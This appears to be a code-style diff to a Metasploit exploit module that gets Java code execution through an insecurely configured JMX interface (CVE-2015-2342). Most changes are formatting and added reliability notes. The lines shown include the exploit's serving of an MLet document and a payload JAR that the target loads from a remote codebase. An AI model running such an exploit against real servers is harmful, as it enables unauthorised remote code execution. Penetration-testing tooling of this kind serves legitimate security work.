@@ -10,44 +10,48 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Java::Rmi::Client
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Java JMX Server Insecure Configuration Java Code Execution',
-      'Description'    => %q{
-        This module takes advantage a Java JMX interface insecure configuration, which would
-        allow loading classes from any remote (HTTP) URL. JMX interfaces with authentication
-        disabled (com.sun.management.jmxremote.authenticate=false) should be vulnerable, while
-        interfaces with authentication enabled will be vulnerable only if a weak configuration
-        is deployed (allowing to use javax.management.loading.MLet, having a security manager
-        allowing to load a ClassLoader MBean, etc.).
-      },
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Java JMX Server Insecure Configuration Java Code Execution',
+        'Description' => %q{
+          This module takes advantage a Java JMX interface insecure configuration, which would
+          allow loading classes from any remote (HTTP) URL. JMX interfaces with authentication
+          disabled (com.sun.management.jmxremote.authenticate=false) should be vulnerable, while
+          interfaces with authentication enabled will be vulnerable only if a weak configuration
+          is deployed (allowing to use javax.management.loading.MLet, having a security manager
+          allowing to load a ClassLoader MBean, etc.).
+        },
+        'Author' => [
           'Braden Thomas', # Attack vector discovery
           'juan vazquez' # Metasploit module
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           ['URL', 'https://docs.oracle.com/javase/8/docs/technotes/guides/jmx/JMX_1_4_specification.pdf'],
           ['URL', 'https://www.optiv.com/blog/exploiting-jmx-rmi'],
           ['CVE', '2015-2342']
         ],
-      'Platform'       => 'java',
-      'Arch'           => ARCH_JAVA,
-      'Privileged'     => false,
-      'Payload'        => { 'BadChars' => '', 'DisableNops' => true },
-      'Stance'         => Msf::Exploit::Stance::Aggressive,
-      'DefaultOptions' =>
-        {
+        'Platform' => 'java',
+        'Arch' => ARCH_JAVA,
+        'Privileged' => false,
+        'Payload' => { 'BadChars' => '', 'DisableNops' => true },
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'DefaultOptions' => {
           'WfsDelay' => 10
         },
-      'Targets'        =>
-        [
+        'Targets' => [
           [ 'Generic (Java Payload)', {} ]
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2013-05-22'
-    ))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2013-05-22',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options([
       Msf::OptString.new('JMX_ROLE', [false, 'The role to interact with an authenticated JMX endpoint']),
@@ -64,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_request_uri(cli, request)
     if @jar.nil?
       p = regenerate_payload(cli)
-      @jar = p.encoded_jar({random:true})
+      @jar = p.encoded_jar({ random: true })
       paths = [
         ["metasploit", "JMXPayloadMBean.class"],
         ["metasploit", "JMXPayload.class"],
@@ -86,18 +90,18 @@ class MetasploitModule < Msf::Exploit::Remote
       mlet << "name=\"#{@mlet}:name=jmxpayload,id=1\" "
       mlet << "codebase=\"#{get_uri}\"></mlet></HTML>"
       send_response(cli, mlet,
-        {
-          'Content-Type' => 'application/octet-stream',
-          'Pragma'       => 'no-cache'
-        })
+                    {
+                      'Content-Type' => 'application/octet-stream',
+                      'Pragma' => 'no-cache'
+                    })
 
       print_status("Replied to request for mlet")
     elsif request.uri =~ /\.jar$/i
       send_response(cli, @jar.pack,
-        {
-          'Content-Type' => 'application/java-archive',
-          'Pragma'       => 'no-cache'
-        })
+                    {
+                      'Content-Type' => 'application/java-archive',
+                      'Pragma' => 'no-cache'
+                    })
       print_status("Replied to request for payload JAR")
     end
   end
@@ -271,7 +275,6 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-
     return false if res.nil?
 
     true
